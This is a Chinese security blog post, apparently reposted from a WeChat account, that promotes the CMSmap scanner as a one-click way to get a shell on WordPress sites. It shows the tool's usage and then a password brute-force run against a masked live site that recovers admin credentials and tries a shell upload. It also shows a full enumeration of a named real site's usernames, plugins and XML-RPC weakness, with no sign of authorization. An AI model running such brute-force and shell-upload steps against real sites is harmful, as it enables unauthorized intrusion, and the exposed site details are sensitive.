秒杀wpscan！wordpress一键getshell

关于CMSmap的介绍我就不多说了，反正我告诉你可以直接对 WordPress, Joomla 以及 Drupal.一键getshell。

下载并使用

➜  soft  git clone https://github.com/Dionach/CMSmap.git➜  CMSmap git:(master) python cmsmap.py CMSmap tool v0.6 - Simple CMS Scanner Author: Mike Manzotti [email protected] Usage: cmsmap.py -t <URL> Targets:      -t, --target    target URL (e.g. 'https://example.com:8080/')      -f, --force     force scan (W)ordpress, (J)oomla or (D)rupal      -F, --fullscan  full scan using large plugin lists. False positives and slow!      -a, --agent     set custom user-agent      -T, --threads   number of threads (Default: 5)      -i, --input     scan multiple targets listed in a given text file      -o, --output    save output in a file      --noedb         enumerate plugins without searching exploits  Brute-Force:      -u, --usr       username or file       -p, --psw       password or file      --noxmlrpc      brute forcing WordPress without XML-RPC  Post Exploitation:      -k, --crack     password hashes file (Require hashcat installed. For WordPress and Joomla only)      -w, --wordlist  wordlist file  Others:      -v, --verbose   verbose mode (Default: false)      -U, --update    (C)MSmap, (W)ordpress plugins and themes, (J)oomla components, (D)rupal modules, (A)ll      -h, --help      show this help  Examples:      cmsmap.py -t https://example.com      cmsmap.py -t https://example.com -f W -F --noedb      cmsmap.py -t https://example.com -i targets.txt -o output.txt      cmsmap.py -t https://example.com -u admin -p passwords.txt      cmsmap.py -k hashes.txt -w passwords.txt

从上面的使用说明可以看出来，这是可以支持多线程暴力破解的。

实践一下

为了保护隐私，我还是打个马赛克吧

➜  CMSmap git:(master) ✗ python cmsmap.py -t http://www.****.org/ -u admin -p pass.txt [-] Date & Time: 15/06/2015 22:36:24 [-] Wordpress Brute Forcing Attack Started [H] Valid Credentials: admin qwerasdf [H] Valid credentials: admin qwerasdf . Do you want to try uploading a shell? [-] (If you are not admin, you won't be able to) [y/N]: y [-] Logging in to the target website as admin:qwerasdf [ERROR] Unable to upload a shell. Probably you are not an admin. [-] Date & Time: 15/06/2015 22:38:59 [-] Completed in: 0:02:35

可以看到这个case是可以爆破，但是不能getshell，因为不是管理员权限的账号。

指纹识别扫描

➜  CMSmap git:(master) ✗ python cmsmap.py -t http://www.jobbole.com/ -f W[-] Date & Time: 15/06/2015 22:58:30[-] Target: http://www.jobbole.com[M] Website Not in HTTPS: http://www.jobbole.com[I] Server: nginx [I] X-Powered-By: PHP/5.3.3[L] X-Frame-Options: Not Enforced [I] Strict-Transport-Security: Not Enforced [I] X-Content-Security-Policy: Not Enforced [I] X-Content-Type-Options: Not Enforced [L] Robots.txt Found: http://www.jobbole.com/robots.txt[I] CMS Detection: Wordpress [I] Wordpress Theme: jobboleblogv3 [-] Enumerating Wordpress Usernames via "Feed" ... [-] Enumerating Wordpress Usernames via "Author" ... [M] 10[M] 11[M] 12[M] 13[M] 14[M] 16[M] 17[M] 18[M] 19[M] 4[M] 9[M] Carey [M] HelloKitty [M] Spokesman [M] admin [M] jobbole [M] Website vulnerable to XML-RPC Brute Force Vulnerability [I] Autocomplete Off Not Found: http://www.jobbole.com/wp-login.php[-] Default WordPress Files: [I] http://www.jobbole.com/readme.html[I] http://www.jobbole.com/license.txt[I] http://www.jobbole.com/xmlrpc.php[I] http://www.jobbole.com/wp-includes/images/crystal/license.txt[I] http://www.jobbole.com/wp-includes/images/crystal/license.txt[I] http://www.jobbole.com/wp-includes/js/plupload/license.txt[I] http://www.jobbole.com/wp-includes/js/plupload/changelog.txt[I] http://www.jobbole.com/wp-includes/js/tinymce/license.txt[I] http://www.jobbole.com/wp-includes/js/tinymce/plugins/spellchecker/changelog.txt[I] http://www.jobbole.com/wp-includes/js/swfupload/license.txt[-] Searching Wordpress Plugins ... [I] jobbole-wp-plugin [I] mu-widgets [I] q2w3-fixed-widget [I] wp-connect [I] wp-postviews [I] akismet [I] bbpress [I] comment-rating [I] login-lockdown [I] ucan-post [-] Searching Wordpress TimThumbs ...6%

我感觉这个直接秒杀wpscan啊，非常的强大

本文始发于微信公众号（关注安全技术）：秒杀wpscan！wordpress一键getshell